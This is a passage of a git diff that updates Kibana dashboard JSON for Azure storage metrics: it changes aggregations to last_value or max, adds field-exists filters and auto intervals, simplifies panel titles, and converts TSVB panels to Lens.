"59f2bee0-1a09-4b55-8016-14ee3cd01079X0" @@ -423,12 +437,12 @@ }, "isBucketed": false, "label": "Queue Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_count.avg" @@ -462,7 +476,7 @@ "metricAccessor": "f9be0a93-f211-4823-9f9a-c5162cde988e" } }, - "title": "Storage Queue Count [Azure Metrics] (converted)", + "title": "Storage Queue Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -477,7 +491,7 @@ "y": 5 }, "panelIndex": "9d84188c-5a30-41ac-81cc-fe4fed360dd3", - "title": "Storage Queue Count [Azure Metrics]", + "title": "Storage Queue Count", "type": "lens", "version": "8.7.0" }, @@ -516,7 +530,7 @@ "params": { "dropPartials": false, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -524,18 +538,22 @@ "d9e64a9b-a0e7-4f70-932d-50c276e132ed": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, "isBucketed": false, "label": "Availability", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " %" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.availability.avg" @@ -626,7 +644,7 @@ "yRightScale": "linear" } }, - "title": "Storage Availability [Azure Metrics] (converted)", + "title": "Storage Availability", "type": "lens", "visualizationType": "lnsXY" }, @@ -719,7 +737,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -811,7 +829,7 @@ "yRightScale": "linear" } }, - "title": "Storage Transactions [Azure Metrics] (converted)", + "title": "Storage Transactions", "type": "lens", "visualizationType": "lnsXY" }, @@ -861,18 +879,22 @@ "27084753-0d21-44c4-9cc8-bb1718d840ed": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, "isBucketed": false, "label": "SuccessServerLatency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_server_latency.avg" @@ -885,7 +907,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1003,7 +1025,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success Server Latency [Azure Metrics] (converted)", + "title": "Storage Success Server Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1053,18 +1075,22 @@ "0629be0e-c959-4df4-89b2-cd98578d8eff": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_e2elatency.avg: *" + }, "isBucketed": false, "label": "Success E2E Latency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_e2elatency.avg" @@ -1077,7 +1103,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1195,7 +1221,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success E2E Latency [Azure Metrics] (converted)", + "title": "Storage Success E2E Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1276,7 +1302,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1390,7 +1416,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Egress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Egress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1445,7 +1471,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1585,7 +1611,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Ingress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Ingress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1610,7 +1636,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.0", - "created_at": "2023-09-01T11:34:52.555Z", + "created_at": "2024-03-29T10:13:12.366Z", "id": "azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc", "migrationVersion": { "dashboard": "8.7.0" diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc.json index 0f5c44c65cc..e132f81b216 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc.json @@ -27,6 +27,7 @@ { "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, "savedVis": { "data": { "aggs": [], @@ -44,7 +45,7 @@ "markdown": "### Azure Storage\n\n[**Overview**](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Blob](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", "openLinksInNewTab": false }, - "title": "Navigation Storage Overview [Azure Metrics]", + "title": "Navigation Storage Overview", "type": "markdown", "uiState": {} } @@ -57,6 +58,7 @@ "y": 0 }, "panelIndex": "3e05fed8-0edd-4973-a640-3499c62b141d", + "title": "Navigation Storage Overview", "type": "visualization", "version": "8.7.0" }, @@ -98,12 +100,12 @@ }, "isBucketed": false, "label": "Used Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.used_capacity.avg" @@ -111,10 +113,10 @@ "a2063525-bfe8-4af3-a408-3b35113a1481": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.used_capacity.avg))", + "label": "overall_max(last_value(azure.storage_account.used_capacity.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.used_capacity.avg))", + "formula": "overall_max(last_value(azure.storage_account.used_capacity.avg))", "isFormulaBroken": false }, "references": [ @@ -125,11 +127,15 @@ "a2063525-bfe8-4af3-a408-3b35113a1481X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.used_capacity.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.used_capacity.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.used_capacity.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.used_capacity.avg" @@ -138,7 +144,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.used_capacity.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.used_capacity.avg))", "operationType": "overall_max", "references": [ "a2063525-bfe8-4af3-a408-3b35113a1481X0" @@ -175,7 +181,7 @@ "showBar": false } }, - "title": "Storage Used Capacity [Azure Metrics] (converted)", + "title": "Storage Used Capacity", "type": "lens", "visualizationType": "lnsMetric" }, @@ -190,7 +196,7 @@ "y": 5 }, "panelIndex": "ed66fab5-f4e7-45d9-b27f-2315e0a10850", - "title": "Storage Used Capacity [Azure Metrics]", + "title": "Storage Used Capacity", "type": "lens", "version": "8.7.0" }, @@ -226,10 +232,10 @@ "6160382c-270e-42f7-9d4a-f644e4af73a1": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.ingress.total))", + "label": "overall_max(max(azure.storage_account.ingress.total))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.ingress.total))", + "formula": "overall_max(max(azure.storage_account.ingress.total))", "isFormulaBroken": false }, "references": [ @@ -241,8 +247,8 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.ingress.total))", - "operationType": "average", + "label": "Part of overall_max(max(azure.storage_account.ingress.total))", + "operationType": "max", "params": { "emptyAsNull": false }, @@ -253,7 +259,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.ingress.total))", + "label": "Part of overall_max(max(azure.storage_account.ingress.total))", "operationType": "overall_max", "references": [ "6160382c-270e-42f7-9d4a-f644e4af73a1X0" @@ -269,7 +275,7 @@ }, "isBucketed": false, "label": "Ingress", - "operationType": "average", + "operationType": "max", "params": { "emptyAsNull": true, "format": { @@ -309,7 +315,7 @@ "showBar": false } }, - "title": "Storage Ingress Gauge [Azure Metrics] (converted)", + "title": "Storage Ingress Gauge", "type": "lens", "visualizationType": "lnsMetric" }, @@ -324,7 +330,7 @@ "y": 5 }, "panelIndex": "71f11ae2-b13c-49b5-ae16-3d6d5e1dacec", - "title": "Storage Ingress Gauge [Azure Metrics]", + "title": "Storage Ingress Gauge", "type": "lens", "version": "8.7.0" }, @@ -366,7 +372,7 @@ }, "isBucketed": false, "label": "Egress", - "operationType": "average", + "operationType": "max", "params": { "emptyAsNull": true, "format": { @@ -379,10 +385,10 @@ "e5b9cf0f-995d-4164-b70b-c3c7d3a28422": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.egress.total))", + "label": "overall_max(max(azure.storage_account.egress.total))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.egress.total))", + "formula": "overall_max(max(azure.storage_account.egress.total))", "isFormulaBroken": false }, "references": [ @@ -394,8 +400,8 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.egress.total))", - "operationType": "average", + "label": "Part of overall_max(max(azure.storage_account.egress.total))", + "operationType": "max", "params": { "emptyAsNull": false }, @@ -406,7 +412,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.egress.total))", + "label": "Part of overall_max(max(azure.storage_account.egress.total))", "operationType": "overall_max", "references": [ "e5b9cf0f-995d-4164-b70b-c3c7d3a28422X0" @@ -442,7 +448,7 @@ "metricAccessor": "18860bc9-c1b5-47ca-8377-355028ce4e63" } }, - "title": "Storage Egress Gauge [Azure Metrics] (converted)", + "title": "Storage Egress Gauge", "type": "lens", "visualizationType": "lnsMetric" }, @@ -457,7 +463,7 @@ "y": 5 }, "panelIndex": "dae9895e-c53a-4989-bab1-1b7b7c233c56", - "title": "Storage Egress Gauge [Azure Metrics]", + "title": "Storage Egress Gauge", "type": "lens", "version": "8.7.0" }, @@ -491,18 +497,22 @@ "0f3a1d5f-a240-422b-aa08-658f47ba2ac6": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, "isBucketed": false, "label": "Availability", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": "%" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.availability.avg" @@ -515,7 +525,7 @@ "params": { "dropPartials": false, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -606,7 +616,7 @@ "yRightScale": "linear" } }, - "title": "Storage Availability [Azure Metrics] (converted)", + "title": "Storage Availability", "type": "lens", "visualizationType": "lnsXY" }, @@ -661,7 +671,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -791,7 +801,7 @@ "yRightScale": "linear" } }, - "title": "Storage Transactions [Azure Metrics] (converted)", + "title": "Storage Transactions", "type": "lens", "visualizationType": "lnsXY" }, @@ -846,7 +856,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -854,18 +864,22 @@ "490543d6-dc11-4696-8261-fa41d4897288": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, "isBucketed": false, "label": "SuccessServerLatency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_server_latency.avg" @@ -983,7 +997,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success Server Latency [Azure Metrics] (converted)", + "title": "Storage Success Server Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1033,18 +1047,22 @@ "70e1d63a-137c-4d51-b195-0dce32c673a8": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_e2elatency.avg: *" + }, "isBucketed": false, "label": "Success E2E Latency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_e2elatency.avg" @@ -1083,7 +1101,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1175,7 +1193,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success E2E Latency [Azure Metrics] (converted)", + "title": "Storage Success E2E Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1230,15 +1248,15 @@ }, "isBucketed": false, "label": "Used Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes", "params": { "decimals": 1 } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.used_capacity.avg" @@ -1346,7 +1364,7 @@ "valueLabels": "show" } }, - "title": "Storage Used Capacity Resource Table [Azure Metrics] (converted)", + "title": "Storage Used Capacity Resource Table", "type": "lens", "visualizationType": "lnsXY" }, @@ -1401,7 +1419,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1541,7 +1559,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Egress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Egress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1618,7 +1636,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1736,7 +1754,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Ingress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Ingress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1761,7 +1779,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.0", - "created_at": "2023-09-01T05:30:06.264Z", + "created_at": "2024-03-29T10:14:24.713Z", "id": "azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc", "migrationVersion": { "dashboard": "8.7.0" diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc.json index b99db13decf..9176e1c920b 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc.json @@ -1,14 +1,12 @@ { - "id": "azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc", - "type": "dashboard", - "namespaces": [ - "default" - ], - "updated_at": "2023-08-08T06:46:29.879Z", - "version": "WzgzMywxXQ==", "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"7eb82f60-7b2e-473f-960b-35b3fa5392d5\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7eb82f60-7b2e-473f-960b-35b3fa5392d5\",\"fieldName\":\"azure.subscription_id\",\"title\":\"Subscription\",\"singleSelect\":true,\"enhancements\":{}}},\"269e473e-2b24-402e-9721-3c9b3bd85458\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"269e473e-2b24-402e-9721-3c9b3bd85458\",\"fieldName\":\"azure.resource.group\",\"title\":\"Resource Group\",\"enhancements\":{}}},\"192cb16e-8bf4-4e63-b95c-338b8fc0fcfa\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"192cb16e-8bf4-4e63-b95c-338b8fc0fcfa\",\"fieldName\":\"azure.resource.name\",\"title\":\"Resource Name\",\"singleSelect\":false,\"enhancements\":{}}}}" + }, "description": "This dashboard shows metrics for the blob storage type in Azure.", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -42,32 +40,17 @@ }, "optionsJSON": { "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ { - "version": "8.3.0", - "type": "visualization", - "gridData": { - "h": 5, - "i": "ed5f5642-c94a-481b-a8c2-7dfe4c6a4f05", - "w": 9, - "x": 0, - "y": 0 - }, - "panelIndex": "ed5f5642-c94a-481b-a8c2-7dfe4c6a4f05", "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, "savedVis": { - "title": "Navigation Blob Storage Overview [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "fontSize": 10, - "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [**Blob**](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", - "openLinksInNewTab": false - }, - "type": "markdown", "data": { "aggs": [], "searchSource": { @@ -77,937 +60,1580 @@ "query": "" } } - } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [**Blob**](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", + "openLinksInNewTab": false + }, + "title": "Navigation Blob Storage Overview", + "type": "markdown", + "uiState": {} } - } - }, - { - "version": "8.3.0", - "type": "visualization", + }, "gridData": { - "h": 9, - "i": "a9456b9b-efa6-410d-a56c-4b66aa8c499e", - "w": 5, - "x": 9, + "h": 5, + "i": "ed5f5642-c94a-481b-a8c2-7dfe4c6a4f05", + "w": 48, + "x": 0, "y": 0 }, - "panelIndex": "a9456b9b-efa6-410d-a56c-4b66aa8c499e", + "panelIndex": "ed5f5642-c94a-481b-a8c2-7dfe4c6a4f05", + "title": "Navigation Blob Storage Overview", + "type": "visualization", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Availability [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color_rules": [ - { - "background_color": "rgba(104,204,202,1)", - "id": "18f616c0-32e2-11ea-867b-37070aefa392", - "operator": "gte", - "value": 100 + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "eaeec0a4-4154-40ae-b023-88b8b8cd9a15": { + "columnOrder": [ + "6ab423e8-6223-4f5a-9332-5ac7b8aa7d1e", + "03f75b15-78c2-4392-bf4c-9cec8e77d105", + "03f75b15-78c2-4392-bf4c-9cec8e77d105X0", + "03f75b15-78c2-4392-bf4c-9cec8e77d105X1" + ], + "columns": { + "03f75b15-78c2-4392-bf4c-9cec8e77d105": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(azure.storage_account.blob_capacity.avg))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(azure.storage_account.blob_capacity.avg))", + "isFormulaBroken": false + }, + "references": [ + "03f75b15-78c2-4392-bf4c-9cec8e77d105X1" + ], + "scale": "ratio" + }, + "03f75b15-78c2-4392-bf4c-9cec8e77d105X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.blob_capacity.avg: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.blob_capacity.avg))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.blob_capacity.avg" + }, + "03f75b15-78c2-4392-bf4c-9cec8e77d105X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.blob_capacity.avg))", + "operationType": "overall_max", + "references": [ + "03f75b15-78c2-4392-bf4c-9cec8e77d105X0" + ], + "scale": "ratio" + }, + "6ab423e8-6223-4f5a-9332-5ac7b8aa7d1e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Blob Capacity", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes" + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.blob_capacity.avg" + } + }, + "incompleteColumns": {} + } + } }, - { - "background_color": "rgba(244,78,59,1)", - "id": "998b1c90-32e2-11ea-867b-37070aefa392", - "operator": "lt", - "value": 100 + "textBased": { + "layers": {} } - ], - "bar_color_rules": [ + }, + "filters": [], + "internalReferences": [ { - "id": "28142cf0-32e2-11ea-867b-37070aefa392" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-eaeec0a4-4154-40ae-b023-88b8b8cd9a15", + "type": "index-pattern" } ], - "drop_last_bucket": 0, - "filter": { + "query": { "language": "kuery", "query": "" }, - "gauge_color_rules": [ - { - "id": "29808e30-32e2-11ea-867b-37070aefa392" - } - ], - "gauge_inner_width": "7", - "gauge_style": "circle", - "gauge_width": 10, - "id": "0e91b810-32e2-11ea-a93d-dd20c62559b3", - "index_pattern": "metrics-*", - "interval": "5m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "rgba(22,165,165,1)", - "fill": "0.6", - "formatter": "number", - "hide_in_legend": 1, - "id": "0e91b811-32e2-11ea-a93d-dd20c62559b3", - "label": "Availability", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.availability.avg", - "id": "0e91b812-32e2-11ea-a93d-dd20c62559b3", - "type": "avg" - } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_mode": "everything", - "stacked": "none", - "terms_field": null, - "type": "timeseries", - "value_template": "{{value}} %" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "time_range_mode": "last_value", - "type": "timeseries", - "use_kibana_indexes": false + "visualization": { + "color": "#009CE0", + "layerId": "eaeec0a4-4154-40ae-b023-88b8b8cd9a15", + "layerType": "data", + "maxAccessor": "03f75b15-78c2-4392-bf4c-9cec8e77d105", + "metricAccessor": "6ab423e8-6223-4f5a-9332-5ac7b8aa7d1e" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } + "title": "Storage Blob Capacity", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false }, - "title": "Availability" - }, - { - "version": "8.3.0", - "type": "visualization", "gridData": { "h": 9, "i": "0c873134-b025-487d-be81-f727dbff0174", "w": 5, - "x": 14, - "y": 0 + "x": 0, + "y": 5 }, "panelIndex": "0c873134-b025-487d-be81-f727dbff0174", + "title": "Storage Blob Capacity", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Blob Capacity [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color": null, - "background_color_rules": [ - { - "id": "71978870-32e4-11ea-af9e-d70582a45bda" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" } - ], - "bar_color_rules": [ + }, + "datasourceStates": { + "formBased": { + "layers": { + "d2cfe212-5327-4afa-b09d-4cea0f4abe67": { + "columnOrder": [ + "7772aa00-2719-4fb3-a52a-732158558669", + "2fd4f627-1d0e-40a7-a622-e57e790e5117X0", + "2fd4f627-1d0e-40a7-a622-e57e790e5117X1", + "2fd4f627-1d0e-40a7-a622-e57e790e5117" + ], + "columns": { + "2fd4f627-1d0e-40a7-a622-e57e790e5117": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(azure.storage_account.blob_count.avg))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(azure.storage_account.blob_count.avg))", + "isFormulaBroken": false + }, + "references": [ + "2fd4f627-1d0e-40a7-a622-e57e790e5117X1" + ], + "scale": "ratio" + }, + "2fd4f627-1d0e-40a7-a622-e57e790e5117X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.blob_count.avg: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.blob_count.avg))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.blob_count.avg" + }, + "2fd4f627-1d0e-40a7-a622-e57e790e5117X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.blob_count.avg))", + "operationType": "overall_max", + "references": [ + "2fd4f627-1d0e-40a7-a622-e57e790e5117X0" + ], + "scale": "ratio" + }, + "7772aa00-2719-4fb3-a52a-732158558669": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Blob Count", + "operationType": "last_value", + "params": { + "format": { + "id": "number" + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.blob_count.avg" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ { - "id": "f11cfd90-32e5-11ea-af9e-d70582a45bda" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-d2cfe212-5327-4afa-b09d-4cea0f4abe67", + "type": "index-pattern" } ], - "drilldown_url": "", - "filter": { + "query": { "language": "kuery", "query": "" }, - "gauge_color_rules": [ - { - "id": "9c09ed50-32e4-11ea-af9e-d70582a45bda" - } - ], - "gauge_inner_color": null, - "gauge_inner_width": "6", - "gauge_style": "circle", - "gauge_width": "10", - "hide_last_value_indicator": true, - "id": "61fb4190-32e4-11ea-b9f8-4d0b340ad993", - "index_pattern": "metrics-*", - "interval": "60m", - "isModelInvalid": false, - "pivot_id": "azure.resource.name", - "pivot_label": "Resource Name", - "pivot_rows": "30", - "pivot_type": "string", - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "rgba(0,156,224,1)", - "fill": "1.2", - "filter": { - "language": "kuery", - "query": "" - }, - "formatter": "bytes", - "id": "61fb4191-32e4-11ea-b9f8-4d0b340ad993", - "label": "Blob Capacity", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.blob_capacity.avg", - "id": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "avg" - } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_mode": "everything", - "stacked": "none", - "terms_field": "azure.resource.name", - "terms_order_by": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "timeseries", - "value_template": "{{value}}" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "gauge", - 